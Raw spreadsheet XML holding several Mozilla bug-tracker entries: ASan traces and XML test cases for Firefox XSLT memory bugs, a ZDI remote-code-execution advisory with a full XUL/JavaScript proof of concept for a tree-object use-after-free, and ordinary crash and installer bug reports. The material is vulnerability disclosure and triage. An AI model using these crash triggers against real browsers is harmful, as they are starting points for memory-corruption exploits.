    #7 0x7fc03af62793 in txMozillaXSLTProcessor::TransformToDocument(nsINode&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1329
    #8 0x7fc039793860 in mozilla::dom::XSLTProcessorBinding::transformToDocument(JSContext*, JS::Handle&lt;JSObject*&gt;, txMozillaXSLTProcessor*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/dom/bindings/./XSLTProcessorBinding.cpp:153
    #9 0x7fc039e1d1ce in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/bindings/BindingUtils.cpp:2691
    #10 0x7fc03e197142 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jscntxtinlines.h:235
    #11 0x7fc03e15d9ac in js::Invoke(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:772:16
    #12 0x7fc03e189add in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:3105
    #13 0x7fc03e175990 in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:725
    #14 0x7fc03e198e42 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:1000
    #15 0x7fc03e1999ab in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:1034
    #16 0x7fc03de42c4c in ExecuteScript(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jsapi.cpp:4598
    #17 0x7fc03de42992 in JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jsapi.cpp:4624
    #18 0x7fc037a5f7d4 in ProcessFile(mozilla::dom::AutoJSAPI&amp;, char const*, _IO_FILE*, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:876
    #19 0x7fc037a5fa73 in Process(mozilla::dom::AutoJSAPI&amp;, char const*, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:929
    #20 0x7fc037a0012f in ProcessArgs(mozilla::dom::AutoJSAPI&amp;, char**, int, XPCShellDirProvider*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:1128
    #21 0x7fc0379fd7c2 in XRE_XPCShellMain /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:1546
    #22 0x48a94f in main /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/shell/xpcshell.cpp:54
    #23 0x7fc031136ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #24 0x48a6cc in _start (/home/azureuser/ff-44/xpcshell+0x48a6cc)
Live demo #1:
http://nicob.net/firefox-aeshooT3/Bug-2/AtomicBaseIncDec-write_av_at_null.xml
XML #2:
&lt;top&gt;
&lt;zou&gt;&lt;/zou&gt;
&lt;/top&gt;
Output #2:
###!!! ASSERTION: We're leaking mEs-&gt;mResultHandler.: 'mEs-&gt;mResultHandler == this', file /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txUnknownHandler.cpp, line 80
=================================================================
==33391==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400005e290 at pc 0x7ff354733d92 bp 0x7fff7a6faf40 sp 0x7fff7a6faf38
READ of size 8 at 0x60400005e290 thread T0
    #0 0x7ff354733d91 in nsAutoPtr&lt;txAXMLEventHandler&gt;::~nsAutoPtr() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/dom/xslt/xslt/../../../dist/include/nsAutoPtr.h:74
    #1 0x7ff354733a75 in txExecutionState::~txExecutionState() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txExecutionState.cpp:94
    #2 0x7ff354756486 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:706
    #3 0x7ff354759793 in txMozillaXSLTProcessor::TransformToDocument(nsINode&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1329
    #4 0x7ff352f8a860 in mozilla::dom::XSLTProcessorBinding::transformToDocument(JSContext*, JS::Handle&lt;JSObject*&gt;, txMozillaXSLTProcessor*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/dom/bindings/./XSLTProcessorBinding.cpp:153
    #5 0x7ff3536141ce in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/bindings/BindingUtils.cpp:2691
    #6 0x7ff35798e142 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jscntxtinlines.h:235
    #7 0x7ff3579549ac in js::Invoke(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:772:16
    #8 0x7ff357980add in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:3105
    #9 0x7ff35796c990 in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:725
    #10 0x7ff35798fe42 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:1000
    #11 0x7ff3579909ab in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:1034
    #12 0x7ff357639c4c in ExecuteScript(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jsapi.cpp:4598
    #13 0x7ff357639992 in JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jsapi.cpp:4624
    #14 0x7ff3512567d4 in ProcessFile(mozilla::dom::AutoJSAPI&amp;, char const*, _IO_FILE*, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:876
    #15 0x7ff351256a73 in Process(mozilla::dom::AutoJSAPI&amp;, char const*, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:929
    #16 0x7ff3511f712f in ProcessArgs(mozilla::dom::AutoJSAPI&amp;, char**, int, XPCShellDirProvider*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:1128
    #17 0x7ff3511f47c2 in XRE_XPCShellMain /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:1546
    #18 0x48a94f in main /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/shell/xpcshell.cpp:54
    #19 0x7ff34a92dec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #20 0x48a6cc in _start (/home/azureuser/ff-44/xpcshell+0x48a6cc)
0x60400005e290 is located 0 bytes inside of 40-byte region [0x60400005e290,0x60400005e2b8)
freed by thread T0 here:
    #0 0x472ae1 in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64
    #1 0x7ff3547338f4 in txExecutionState::~txExecutionState() /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txExecutionState.cpp:85:37
    #2 0x7ff354756486 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:706
    #3 0x7ff354759793 in txMozillaXSLTProcessor::TransformToDocument(nsINode&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1329
    #4 0x7ff352f8a860 in mozilla::dom::XSLTProcessorBinding::transformToDocument(JSContext*, JS::Handle&lt;JSObject*&gt;, txMozillaXSLTProcessor*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/dom/bindings/./XSLTProcessorBinding.cpp:153
    #5 0x7ff3536141ce in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/bindings/BindingUtils.cpp:2691
    #6 0x7ff35798e142 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jscntxtinlines.h:235
    #7 0x7ff3579549ac in js::Invoke(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:772:16
    #8 0x7ff357980add in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:3105
    #9 0x7ff35796c990 in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:725
    #10 0x7ff35798fe42 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:1000
    #11 0x7ff3579909ab in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:1034
    #12 0x7ff357639c4c in ExecuteScript(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jsapi.cpp:4598
    #13 0x7ff357639992 in JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jsapi.cpp:4624
    #14 0x7ff3512567d4 in ProcessFile(mozilla::dom::AutoJSAPI&amp;, char const*, _IO_FILE*, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:876
    #15 0x7ff351256a73 in Process(mozilla::dom::AutoJSAPI&amp;, char const*, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:929
    #16 0x7ff3511f712f in ProcessArgs(mozilla::dom::AutoJSAPI&amp;, char**, int, XPCShellDirProvider*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:1128
    #17 0x7ff3511f47c2 in XRE_XPCShellMain /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:1546
    #18 0x48a94f in main /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/shell/xpcshell.cpp:54
    #19 0x7ff34a92dec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
previously allocated by thread T0 here:
    #0 0x472ce1 in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x48b0ad in moz_xmalloc /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/memory/mozalloc/mozalloc.cpp:83
    #2 0x7ff3547516a1 in operator new(unsigned long) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/dom/xslt/xslt/../../../dist/include/mozilla/mozalloc.h:186
    #3 0x7ff3547516a1 in txToDocHandlerFactory::createHandlerWith(txOutputFormat*, txAXMLEventHandler**) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:92
    #4 0x7ff354733f62 in txExecutionState::init(txXPathNode const&amp;, txOwningExpandedNameMap&lt;txIGlobalParameter&gt;*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txExecutionState.cpp:112
    #5 0x7ff35475632d in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:677
    #6 0x7ff354759793 in txMozillaXSLTProcessor::TransformToDocument(nsINode&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1329
    #7 0x7ff352f8a860 in mozilla::dom::XSLTProcessorBinding::transformToDocument(JSContext*, JS::Handle&lt;JSObject*&gt;, txMozillaXSLTProcessor*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/dom/bindings/./XSLTProcessorBinding.cpp:153
    #8 0x7ff3536141ce in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/dom/bindings/BindingUtils.cpp:2691
    #9 0x7ff35798e142 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jscntxtinlines.h:235
    #10 0x7ff3579549ac in js::Invoke(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:772:16
    #11 0x7ff357980add in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:3105
    #12 0x7ff35796c990 in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:725
    #13 0x7ff35798fe42 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:1000
    #14 0x7ff3579909ab in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/vm/Interpreter.cpp:1034
    #15 0x7ff357639c4c in ExecuteScript(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jsapi.cpp:4598
    #16 0x7ff357639992 in JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/src/jsapi.cpp:4624
    #17 0x7ff3512567d4 in ProcessFile(mozilla::dom::AutoJSAPI&amp;, char const*, _IO_FILE*, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:876
    #18 0x7ff351256a73 in Process(mozilla::dom::AutoJSAPI&amp;, char const*, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:929
    #19 0x7ff3511f712f in ProcessArgs(mozilla::dom::AutoJSAPI&amp;, char**, int, XPCShellDirProvider*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:1128
    #20 0x7ff3511f47c2 in XRE_XPCShellMain /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/src/XPCShellImpl.cpp:1546
    #21 0x48a94f in main /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/js/xpconnect/shell/xpcshell.cpp:54
    #22 0x7ff34a92dec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-cen-l64-asan-d-0000000000000/build/src/obj-firefox/dom/xslt/xslt/../../../dist/include/nsAutoPtr.h:74 nsAutoPtr&lt;txAXMLEventHandler&gt;::~nsAutoPtr()
Live demo #2: 
http://nicob.net/firefox-aeshooT3/Bug-2/nsAutoPtr-heap_uaf.xml</t>
        </is>
      </c>
      <c r="X2110" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2111">
      <c r="A2111" t="n">
        <v>576075</v>
      </c>
      <c r="B2111" t="inlineStr">
        <is>
          <t>2010-06-30 13:22:35 -0700</t>
        </is>
      </c>
      <c r="C2111" t="inlineStr">
        <is>
          <t>tree Object Removal Remote Code Execution Vulnerability (ZDI-CAN-817)</t>
        </is>
      </c>
      <c r="D2111" t="inlineStr">
        <is>
          <t>2010-09-27 18:29:15 -0700</t>
        </is>
      </c>
      <c r="E2111" t="n">
        <v>1</v>
      </c>
      <c r="F2111" t="n">
        <v>1</v>
      </c>
      <c r="G2111" t="n">
        <v>3</v>
      </c>
      <c r="H2111" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2111" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2111" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2111" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2111" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2111" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2111" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2111" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2111" t="inlineStr">
        <is>
          <t>[sg:critical?] maybe sg:dos in 1.9.2 and later? [critsmash:investigating]</t>
        </is>
      </c>
      <c r="Q2111" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2111" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2111" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2111" t="n">
        <v>1</v>
      </c>
      <c r="U2111" t="n">
        <v>0</v>
      </c>
      <c r="V2111" t="n">
        <v>20</v>
      </c>
      <c r="W2111" t="inlineStr">
        <is>
          <t>Created attachment 455236
PoC
ZDI-CAN-817: Mozilla Firefox tree Object Removal Remote Code Execution Vulnerability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support for XUL &lt;tree&gt; objects. If a
specific property of a tree object is set and the parent node attempts
to remove the child, the process can be made to access invalid memory.
This can be abused by an attacker to execute remote code under the
context of the user running the browser.
Version(s)  tested: Mozilla Firefox 3.6.2
Platform(s) tested: Windows XP SP3 x86
&lt;window
xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
        onload="run()"&gt;
&lt;tree&gt;
  &lt;treecols/&gt;
  &lt;treechildren/&gt;
&lt;/tree&gt;
&lt;script type="text/javascript"&gt;&lt;![CDATA[
function run() {
  var tree = document.getElementsByTagName("tree")[0];
  var view = tree.treeBoxObject.view;
  view.selection = {
    isSelected : function(i) {
      return false;
    },
    set tree(t) {
      if (t == null) {
        tree.parentNode.removeChild(tree);
      }
    }
  };
  var body = tree.treeBoxObject.treeBody;
  body.parentNode.removeChild(body);
}
]]&gt;&lt;/script&gt;
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X2111" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2112">
      <c r="A2112" t="n">
        <v>1185157</v>
      </c>
      <c r="B2112" t="inlineStr">
        <is>
          <t>2015-07-17 16:05:34 -0700</t>
        </is>
      </c>
      <c r="C2112" t="inlineStr">
        <is>
          <t>Assertion failures in accessibility IPC</t>
        </is>
      </c>
      <c r="D2112" t="inlineStr">
        <is>
          <t>2016-07-02 10:53:27 -0700</t>
        </is>
      </c>
      <c r="E2112" t="n">
        <v>1</v>
      </c>
      <c r="F2112" t="n">
        <v>1</v>
      </c>
      <c r="G2112" t="n">
        <v>3</v>
      </c>
      <c r="H2112" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2112" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2112" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K2112" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2112" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2112" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2112" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2112" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2112" t="inlineStr">
        <is>
          <t>[e10s-only][post-critsmash-triage][adv-main42+]</t>
        </is>
      </c>
      <c r="Q2112" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2112" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2112" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T2112" t="n">
        <v>1</v>
      </c>
      <c r="U2112" t="n">
        <v>0</v>
      </c>
      <c r="V2112" t="n">
        <v>13</v>
      </c>
      <c r="W2112" t="inlineStr">
        <is>
          <t>This is a fairly common IPC assertion crash on Nightly. We're inside mozilla::layout::PVsyncChild::OnMessageReceived(), which calls nsRefreshDriver::Tick(), which calls mozilla::a11y::NotificationController::WillRefresh(), which then calls mozilla::a11y::PDocAccessibleChild::SendTextChangeEvent() or SendHideEvent(), which tries to send a message. This is on the main thread in the content process. I'm not sure if the issue is the nested IPC or whether a11y IPC is supposed to run no another thread or what.
Here are some example crash reports:
https://crash-stats.mozilla.com/report/index/9aef00e4-cefb-476a-8cc3-525fd2150717
https://crash-stats.mozilla.com/report/index/74205d66-570b-49bf-84a0-8a9a72150717
https://crash-stats.mozilla.com/report/index/46415e7d-cede-4614-a630-d34b02150716
https://crash-stats.mozilla.com/report/index/30a44a30-bb8b-479f-89c1-f05bf2150716</t>
        </is>
      </c>
      <c r="X2112" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2113">
      <c r="A2113" t="n">
        <v>245810</v>
      </c>
      <c r="B2113" t="inlineStr">
        <is>
          <t>2004-06-07 10:56:47 -0700</t>
        </is>
      </c>
      <c r="C2113" t="inlineStr">
        <is>
          <t>Help is broken (XML Parsing Error) in installer builds</t>
        </is>
      </c>
      <c r="D2113" t="inlineStr">
        <is>
          <t>2006-04-04 13:17:10 -0700</t>
        </is>
      </c>
      <c r="E2113" t="n">
        <v>1</v>
      </c>
      <c r="F2113" t="n">
        <v>1</v>
      </c>
      <c r="G2113" t="n">
        <v>2</v>
      </c>
      <c r="H2113" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2113" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2113" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K2113" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2113" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2113" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2113" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2113" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2113" t="inlineStr"/>
      <c r="Q2113" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2113" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2113" t="inlineStr">
        <is>
          <t>Firefox0.9</t>
        </is>
      </c>
      <c r="T2113" t="n">
        <v>1</v>
      </c>
      <c r="U2113" t="n">
        <v>0</v>
      </c>
      <c r="V2113" t="n">
        <v>24</v>
      </c>
      <c r="W2113" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040607 Firefox/0.8.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040607 Firefox/0.8.0+
I installed the WIndows 6/7/2004 0.9 nightly in a clean directory and started it
with a clean profile.  If I select either Help-&gt;Help Contents I get the
following pop-up error:
XML Parsing Error: xml processing insstruction not at start of external entity
Location: chrome://help/content/help.xul
Line Number 1, Column 1:
^
Reproducible: Always
Steps to Reproduce:
1.  Install Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7)
Gecko/20040607 Firefox/0.8.0+ in a clean directory and start with a fresh profile.
2.  Select Help -&gt; Help Contents
3.
Actual Results:  
pop-up error
Expected Results:  
launched Help</t>
        </is>
      </c>
      <c r="X2113" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2114">
      <c r="A2114" t="n">
        <v>90445</v>
      </c>
      <c r="B2114" t="inlineStr">
        <is>
          <t>2001-07-12 00:05:50 -0700</t>
        </is>
      </c>
      <c r="C2114" t="inlineStr">
        <is>
          <t>Crash compiling bloated function while loading page.</t>
        </is>
      </c>
      <c r="D2114" t="inlineStr">
        <is>
          <t>2011-08-05 21:31:06 -0700</t>
        </is>
      </c>
      <c r="E2114" t="n">
        <v>1</v>
      </c>
      <c r="F2114" t="n">
        <v>1</v>
      </c>
      <c r="G2114" t="n">
        <v>3</v>
      </c>
      <c r="H2114" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2114" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2114" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2114" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2114" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2114" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2114" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2114" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2114" t="inlineStr"/>
      <c r="Q2114" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2114" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2114" t="inlineStr">
        <is>
          <t>mozilla0.9.4</t>
        </is>
      </c>
      <c r="T2114" t="n">
        <v>1</v>
      </c>
      <c r="U2114" t="n">
        <v>0</v>
      </c>
      <c r="V2114" t="n">
        <v>22</v>
      </c>
      <c r="W2114" t="inlineStr">
        <is>
          <t>I hit a page with the following, uh, sub-optimally-coded function. 
However, mozilla shouldn't crash. We do.
Here's the top of the stack. Will attach full stack trace and the 
offending function definition.
PatchGotos(JSContext * 0x022e56b0, JSCodeGenerator * 0x0012f078, JSStmtInfo * 
0x0012c748, int 33129, unsigned char * 0x035331a3, unsigned char 6) line 406 + 
2 bytes
js_PopStatementCG(JSContext * 0x022e56b0, JSCodeGenerator * 0x0012f078) line 
442 + 25 bytes
js_EmitTree(JSContext * 0x000003df, JSCodeGenerator * 0x03501680, JSParseNode * 
0x03501650) line 1680 + 7 bytes
js_EmitTree(JSContext * 0x022e56b0, JSCodeGenerator * 0x00000000, JSParseNode * 
0x03501130) line 2135 + 8 bytes
js_EmitTree(JSContext * 0x000003d4, JSCodeGenerator * 0x00000000, JSParseNode * 
0x03500e20) line 1056 + 10 bytes
js_EmitTree(JSContext * 0x022e56b0, JSCodeGenerator * 0x00000000, JSParseNode * 
0x03500d30) line 2135 + 8 bytes
